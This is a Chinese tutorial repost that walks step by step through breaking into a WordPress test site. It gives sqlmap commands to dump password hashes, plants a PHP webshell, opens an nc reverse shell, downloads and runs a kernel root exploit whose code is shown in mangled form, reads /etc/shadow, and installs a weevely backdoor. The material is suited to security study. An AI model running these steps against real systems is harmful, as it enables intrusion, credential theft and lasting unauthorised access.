0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

黑客常用的入手思路和技术手法

Android编程精选 来源:Android编程精选 作者:Android编程精选 2022-07-27 10:44 次阅读

通过本文你将了解黑客常用的入手思路和技术手法,适合热爱网络信息安全的新手朋友了解学习。本文将从最开始的信息收集开始讲述黑客是如何一步步的攻破你的网站和服务器的。阅读本文你会学到以下内容: 1.渗透测试前的简单信息收集。 2.sqlmap的使用 3.nmap的使用 4.nc反弹提权 5.linux系统的权限提升 6.backtrack 5中渗透测试工具nikto和w3af的使用等. 假设黑客要入侵的你的网站域名为:hack-test.com 让我们用ping命令获取网站服务器的IP地址 564710fa-0cd9-11ed-ba43-dac502259ad0.jpg   现在我们获取了网站服务器的IP地址为:173.236.138.113   寻找同一服务器上的其它网站,我们使用sameip.org.   5664df0e-0cd9-11ed-ba43-dac502259ad0.jpg   26 sites hosted on IP Address 173.236.138.113  

ID Domain Site Link
1 hijackthisforum.com hijackthisforum.com
2 sportforum.net sportforum.net
3 freeonlinesudoku.net freeonlinesudoku.net
4 cosplayhell.com cosplayhell.com
5 videogamenews.org videogamenews.org
6 gametour.com gametour.com
7 qualitypetsitting.net qualitypetsitting.net
8 brendanichols.com brendanichols.com
9 8ez.com 8ez.com
10 hack-test.com hack-test.com
11 kisax.com kisax.com
12 paisans.com paisans.com
13 mghz.com mghz.com
14 debateful.com debateful.com
15 jazzygoodtimes.com jazzygoodtimes.com
16 fruny.com fruny.com
17 vbum.com vbum.com
18 wuckie.com wuckie.com
19 force5inc.com force5inc.com
20 virushero.com virushero.com
21 twincitiesbusinesspeernetwork.com twincitiesbusinesspeernetwork.com
22 jennieko.com jennieko.com
23 davereedy.com davereedy.com
24 joygarrido.com joygarrido.com
25 prismapp.com prismapp.com
26 utiligolf.com utiligolf.com

173.236.138.113上有26个网站,很多黑客为了攻破你的网站可能会检查同服务器上的其它网站,但是本次是以研究为目标,我们将抛开服务器上的其它网站,只针对你的网站来进行入侵检测。 我们需要关于你网站的以下信息: 1. DNS records (A, NS, TXT, MX and SOA) 2. Web Server Type (Apache, IIS, Tomcat) 3. Registrar (the company that owns your domain) 4. Your name, address, email and phone 5. Scripts that your site uses (php, asp, asp.net, jsp, cfm) 6. Your server OS (Unix,Linux,Windows,Solaris) 7. Your server open ports to internet (80, 443, 21, etc.) 让我们开始找你网站的DNS记录,我们用who.is来完成这一目标. 56858178-0cd9-11ed-ba43-dac502259ad0.jpg   我们发现你的DNS记录如下   5694affe-0cd9-11ed-ba43-dac502259ad0.jpg    让我们来确定web服务器的类型   56a853ec-0cd9-11ed-ba43-dac502259ad0.jpg   发现你的Web服务器是apache,接下来确定它的版本.    IP: 173.236.138.113 Website Status: active Server Type: Apache Alexa Trend/Rank:  1 Month:3,213,968 3 Month: 2,161,753 Page Views per Visit:  1 Month: 2.0 3Month: 3.7   接下来是时候寻找你网站域名的注册信息,你的电话、邮箱、地址等.   56babc26-0cd9-11ed-ba43-dac502259ad0.jpg   我们现在已经获取了你的网站域名的注册信息,包括你的重要信息等.   我们可以通过backtrack5中的whatweb来获取你的网站服务器操作系统类型和服务器的版本.   56da4eec-0cd9-11ed-ba43-dac502259ad0.png56f80b3a-0cd9-11ed-ba43-dac502259ad0.png   我们发现你的网站使用了著名的php整站程序wordpress,服务器的的系统类型为FedoraLinux,Web服务器版本Apache 2.2.15.继续查看网站服务器开放的端口,用渗透测试工具nmap:   1-Find services that run on server(查看服务器上运行的服务)   570b3a8e-0cd9-11ed-ba43-dac502259ad0.jpg   2-Find server OS(查看操作系统版本)   5729e0ce-0cd9-11ed-ba43-dac502259ad0.jpg   只有80端口是开放的,操作系统是Linux2.6.22(Fedora Core 6),现在我们已经收集了所有关于你网站的重要信息,接下来开始扫描寻找漏洞,比如:   Sql injection – Blind sql injection – LFI – RFI – XSS – CSRF等等.   我们将使用Nikto来收集漏洞信息:   root@bt:/pentest/web/nikto# perlnikto.pl -h hack-test.com   574a97c4-0cd9-11ed-ba43-dac502259ad0.jpg   我们也会用到Backtrack 5 R1中的W3AF 工具:   root@bt:/pentest/web/w3af#./w3af_gui   575f3b0c-0cd9-11ed-ba43-dac502259ad0.jpg   我们输入要检测的网站地址,选择完整的安全审计选项.   57719b26-0cd9-11ed-ba43-dac502259ad0.jpg   稍等一会,你将会看到扫描结果.   57880e9c-0cd9-11ed-ba43-dac502259ad0.jpg    发现你的网站存在sql注入漏洞、XSS漏洞、以及其它的漏洞.让我们来探讨SQL注入漏洞.   http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220   我们通过工具发现这个URL存在SQL注入,我们通过Sqlmap来检测这个url.   Using sqlmap with –u url   57a40dc2-0cd9-11ed-ba43-dac502259ad0.png   过一会你会看到   57b490de-0cd9-11ed-ba43-dac502259ad0.png   输入N按回车键继续   57d2e2b4-0cd9-11ed-ba43-dac502259ad0.jpg   我们发现你的网站存在mysql显错注入,mysql数据库版本是5.0. 我们通过加入参数”-dbs”来尝试采集数据库名.   57e7e38a-0cd9-11ed-ba43-dac502259ad0.png   57fe3a40-0cd9-11ed-ba43-dac502259ad0.png   发现三个数据库,接下来通过参数”-D wordpress -tables”来查看wordpress数据库的所有表名   580bb1fc-0cd9-11ed-ba43-dac502259ad0.png   582612ea-0cd9-11ed-ba43-dac502259ad0.jpg   通过参数“-T wp_users –columns ”来查看wp_users表中的字段.   583be868-0cd9-11ed-ba43-dac502259ad0.png   584ed6a8-0cd9-11ed-ba43-dac502259ad0.jpg   接下来猜解字段user_login和user_pass的值.用参数”-C user_login,user_pass–dump”   5861a9ea-0cd9-11ed-ba43-dac502259ad0.jpg   我们会发现用户名和密码hashes值. 我们需要通过以下在线破解网站来破解密码hashes   http://www.onlinehashcrack.com/free-hash-reverse.php   5879bfa8-0cd9-11ed-ba43-dac502259ad0.png 登陆wordpress的后台wp-admin   尝试上传php webshell到服务器,以方便运行一些linux命令.在插件页面寻找任何可以编辑的插件.我们选择Textile这款插件,编辑插入我们的php webshell,点击更新文件,然后访问我们的phpwebshell.   5889a814-0cd9-11ed-ba43-dac502259ad0.jpg58a26c46-0cd9-11ed-ba43-dac502259ad0.jpg   Phpwebshell被解析了,我们可以控制你网站的文件,但是我们只希望获得网站服务器的root权限,来入侵服务器上其它的网站。   我们用NC来反弹一个shell,首先在我们的电脑上监听5555端口.   58b0851a-0cd9-11ed-ba43-dac502259ad0.png   然后在Php webshell上反向连接我们的电脑,输入你的IP和端口5555.   58c6be0c-0cd9-11ed-ba43-dac502259ad0.jpg 点击连接我们会看到   58e26238-0cd9-11ed-ba43-dac502259ad0.png   接下来我们尝试执行一些命令:

id
uid=48(apache) gid=489(apache) groups=489(apache) (用来显示用户的id和组)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins (显示服务器上当前的路径)
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 72145 EST 2009 i686 i686 i386 GNU/Linux
(显示内核版本信息) 58f7fc42-0cd9-11ed-ba43-dac502259ad0.jpg   现在我们知道,服务器的内核版本是2.6.31.5-127.fc12.1686,我们在exploit-db.com中搜索此版本的相关漏洞.
在服务器上测试了很多exp之后,我们用以下的exp来提升权限. http://www.exploit-db.com/exploits/15285 我们在nc shell上执行以下命令: wgethttp://www.exploit-db.com/exploits/15285 -o roro.c (下载exp到服务器并重命名为roro.c)
注:很多linux内核的exp都是C语言开发的,因此我们保存为.c扩展名.
exp roro.c代码如下:

#include#include#include#include#include#include#include#include#include#include#include#define RECVPORT 5555#define SENDPORT 6666int prep_sock(int port){int s, ret;struct sockaddr_in addr;s = socket(PF_RDS, SOCK_SEQPACKET, 0);if(s < 0){printf(“[*] Could not open socket.”);exit(-1);}memset(&addr, 0, sizeof(addr));
通过以上代码我们发现该exp是C语言开发的,我们需要将它编译成elf格式的,命令如下: gcc roro.c –ororo 接下来执行编译好的exp ./roro 5914aed2-0cd9-11ed-ba43-dac502259ad0.jpg   执行完成之后我们输入id命令
id
我们发现我们已经是root权限了
uid=0(root) gid=0(root) 592c7152-0cd9-11ed-ba43-dac502259ad0.png   现在我们可以查看/etc/shadow文件
cat/etc/shadow 5944a060-0cd9-11ed-ba43-dac502259ad0.jpg   我们可以使用”john theripper”工具破解所有用户的密码.但是我们不会这样做,我们需要在这个服务器上留下后门以方便我们在任何时候访问它.   我们用weevely制作一个php小马上传到服务器上.   1.weevely使用选项
root@bt:/pentest/backdoors/web/weevely#./main.py - 59623c38-0cd9-11ed-ba43-dac502259ad0.jpg   2.用weevely创建一个密码为koko的php后门   root@bt:/pentest/backdoors/web/weevely#./main.py -g -o hax.php -p koko   596fae04-0cd9-11ed-ba43-dac502259ad0.jpg   接下来上传到服务器之后来使用它
root@bt:/pentest/backdoors/web/weevely#./main.py -t -uhttp://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -pkoko 598135de-0cd9-11ed-ba43-dac502259ad0.jpg   测试我们的hax.php后门   5993ec4c-0cd9-11ed-ba43-dac502259ad0.jpg
审核编辑:彭静
声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • 服务器
    +关注

    关注

    12

    文章

    9021

    浏览量

    85185
  • 黑客
    +关注

    关注

    3

    文章

    284

    浏览量

    21843
  • 网络信息
    +关注

    关注

    0

    文章

    27

    浏览量

    10261

原文标题:黑客是如何攻破一个网站的?

文章出处:【微信号:AndroidPush,微信公众号:Android编程精选】欢迎添加关注!文章转载请注明出处。

收藏 人收藏

    评论

    相关推荐

    监控平台设计思路

    电子发烧友网站提供《监控平台设计思路.pptx》资料免费下载
    发表于 10-09 11:18 0次下载

    SiRider S1芯擎工业开发板测评+1.防止黑客入侵通信监控系统(PSA)

    选!当然啦,如果你觉得它太厉害了有点害怕的话,那就把它想象成一个友好的机器人伙伴吧,它会一直陪伴你走过每一个技术难关的! 接下来咱们开始一起使用SiRider S1防止黑客监控吧!这事儿听起来挺严肃
    发表于 09-08 21:58

    请教延时电路的设计思路

    想设计一套延时启动电路. 请老师们提供下思路 使用机械定时器, (电风扇的定时器) , 当定时结束时, 电机开始工作. 望赐教. 谢谢
    发表于 06-25 22:15

    AMD遇黑客攻击,但称运营无大碍

    近日,科技圈传来一则震惊的消息:全球知名的半导体制造商AMD公司遭遇了黑客组织的攻击。据悉,一个名为Intelbroker的黑客组织成功入侵了AMD的系统,并盗取了包括未来产品详细信息、客户数据库、财务记录、源代码、固件等一系列敏感信息。
    的头像 发表于 06-24 11:00 491次阅读

    环球晶遭黑客攻击!

    6月14日消息,环球晶6月13日发布公告,称部分资讯系统遭受黑客攻击,目前正积极会同技术专家协助调查和复原工作。环球晶表示,少数厂区部分产线受到影响,将会先使用库存出货因应,若有不足,有的可能要延迟
    的头像 发表于 06-14 16:27 490次阅读
    环球晶遭<b class='flag-5'>黑客</b>攻击!

    一种 IT 和 OT 安全融合的思路

    摘 要 数字化、网络化、智能化加速发展,使得信息技术(Information Technology,IT)与操作技术(Operation Technology,OT)融合成为工业数字化转型和制造业
    的头像 发表于 05-09 11:16 449次阅读

    面向混合集成电路的数字化研制目标和思路

    混合集成电路产品数字化研制总体思路是:坚持“模型”是核心、“模型贯穿”是主线、“模型构建与仿真验证”是主要抓手的总体思路
    的头像 发表于 04-17 11:26 737次阅读
    面向混合集成电路的数字化研制目标和<b class='flag-5'>思路</b>

    如何构筑身份安全防线,避免被黑客“登入”企业网络?

    黑客常用的攻击手段,从用尽十八般武艺、不可告人的“侵入”,变成凭借有效账户、大摇大摆的“登入”,你会不会觉得不可思议?
    的头像 发表于 03-28 13:44 496次阅读
    如何构筑身份安全防线,避免被<b class='flag-5'>黑客</b>“登入”企业网络?

    特斯拉修补黑客竞赛发现的漏洞,Pwn2Own助其领先安全领域

    作为领先电动车品牌,特斯拉始终重视网络安全,并且与白帽黑客建立伙伴关系。为此,特斯拉依托Pwn2Own等黑客赛事平台,以重金奖励挖掘漏洞以弥补隐患。这一措施取得良好成效,数百个漏洞已在发现前被及时修复。
    的头像 发表于 03-22 11:35 456次阅读

    自学STM32的话应该从哪入手

    麻烦问一下自学STM32应该怎样入手呢,很多库文件引用有点看不懂,是要从51开始学起吗
    发表于 03-21 09:28

    请求黑客帮忙

    请问这里有没有可以帮我恢复之前已删除的微信聊天记录黑客高手啊?
    发表于 03-09 12:05

    黑客入侵!半导体设备行业面临网络安全挑战

    鸿海集团旗下半导体设备大厂京鼎遭黑客入侵,黑客集团直接在网站上威胁京鼎客户与员工,如果京鼎置之不理,客户资料将会被公开,员工也将因此失去工作。
    发表于 01-17 10:40 531次阅读
    <b class='flag-5'>黑客</b>入侵!半导体设备行业面临网络安全挑战

    京鼎公司遭黑客挟持,客户及员工资料泄露风险

    据了解,1月16 日,台北市竹科园区企业在浏览京鼎网址时,惊讶地发现其已落入黑客主控之下,黑客甚至在网页上发布两段信息,明确警告客户京鼎的客户资料已落入他们手中,若不给钱,客户的私人信息将立即公开;
    的头像 发表于 01-17 09:41 664次阅读

    物联网领域常用的定位技术有哪些?

    物联网领域常用的定位技术有哪些? 物联网领域常用的定位技术有许多,包括全球卫星导航系统(GNSS)、蜂窝网络定位、无线局域网定位、蓝牙定位、超宽带定位、射频识别(RFID)等。本文将详
    的头像 发表于 12-12 14:40 3446次阅读

    LDMOS在ESD设计中的应用设计思路

    LDMOS属于功率半导体器件,主要应用于高压场合。而针对高压芯片的ESD防护领域,可采取GGNLDMOS的设计思路
    发表于 12-06 13:54 6157次阅读
    LDMOS在ESD设计中的应用设计<b class='flag-5'>思路</b>